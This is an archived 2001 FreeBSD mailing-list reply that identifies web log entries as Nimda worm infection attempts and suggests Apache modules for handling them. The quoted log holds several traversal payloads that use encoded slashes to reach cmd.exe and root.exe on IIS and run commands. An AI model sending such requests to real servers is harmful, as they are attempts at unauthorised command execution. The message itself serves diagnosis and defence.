Date: Tue, 13 Nov 2001 23:00:56 -0500 From: Louis LeBlanc <leblanc+freebsd@keyslapper.org> To: freebsd-questions@FreeBSD.org, freebsd-questions@FreeBSD.org Subject: Re: Do these errors mean my system is comprimised? Message-ID: <20011114040055.GB25941@keyslapper.org> In-Reply-To: <0111131938440F.60958@chip.wiegand.org> References: <0111131938440F.60958@chip.wiegand.org>
next in thread | previous in thread | raw e-mail | index | archive | help
--pvezYHf7grwyp3Bc Content-Type: text/plain; charset=unknown-8bit Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 11/13/01 07:38 PM, Chip sat at the `puter and typed: > I found the following on my apache/freebsd/php/mysql server in my log aft= er=20 > running analog - > Looks like someone planted something that wants NT to work correctly - > =20 > 111: /scripts/..%255c../winnt/system32/cmd.exe > 111: /scripts/..%255c../winnt/system32/cmd.exe?/c+dir > 106: /scripts/..%5c../winnt/system32/cmd.exe > 106: /scripts/..%5c../winnt/system32/cmd.exe?/c+dir > 66: /scripts/root.exe > 66: /scripts/root.exe?/c+dir > 64: /MSADC/root.exe > 64: /MSADC/root.exe?/c+dir > 62: /c/winnt/system32/cmd.exe > 62: /c/winnt/system32/cmd.exe?/c+dir > 59: /d/winnt/system32/cmd.exe > 59: /d/winnt/system32/cmd.exe?/c+dir > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > 56: /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c= +dir > 56:=20 > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe > 56: =20 > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt= /system32/cmd.exe?/c+dir > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe > 56: /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c= +dir > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe > 55: /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir > 54: /scripts/winnt/system32/cmd.exe > 54: /scripts/winnt/system32/cmd.exe?/c+dir > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe > 54: /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir > 54: /scripts/..%c0%af../winnt/system32/cmd.exe > 54: /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir > 51: /scripts/..%252f../winnt/system32/cmd.exe > 51: /scripts/..%252f../winnt/system32/cmd.exe?/c+dir This is the footprint of the Nimda virus *trying* to infect your system. You can find links to specific info on what Nimda tries to do on Google, if you want to sort thru a million hits. You can also get info on how an Apache installation can handle these (or not handle them) at http://www.keyslapper.org/modules/ Look for the Apache::Nimda page, even if you don't want to report it to abuse and SecurityFocus, there are config ideas that will help you reduce the impact on your log file size. Also, look for the Apache::404 module. It will handle those misses and notify you via email - once per period for each URL. It can help you keep track of Nimda's impact on your server, and keep dead links tied up. Enough of the shameless plug. Check it out. HTH Lou --=20 Louis LeBlanc leblanc@keyslapper.org Fully Funded Hobbyist, KeySlapper Extrordinaire :) http://www.keyslapper.org =D4=BF=D4=AC Bershere's Formula for Failure: There are only two kinds of people who fail: those who listen to nobody... and those who listen to everybody. --pvezYHf7grwyp3Bc Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE78ex3eAPWYrNkRWIRAtVaAJ0U4V8SAxzA+R15aX7D6UrCIjyycQCcCb37 iubnYGQtOzpVctnRxbC155s= =e3Wa -----END PGP SIGNATURE----- --pvezYHf7grwyp3Bc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011114040055.GB25941>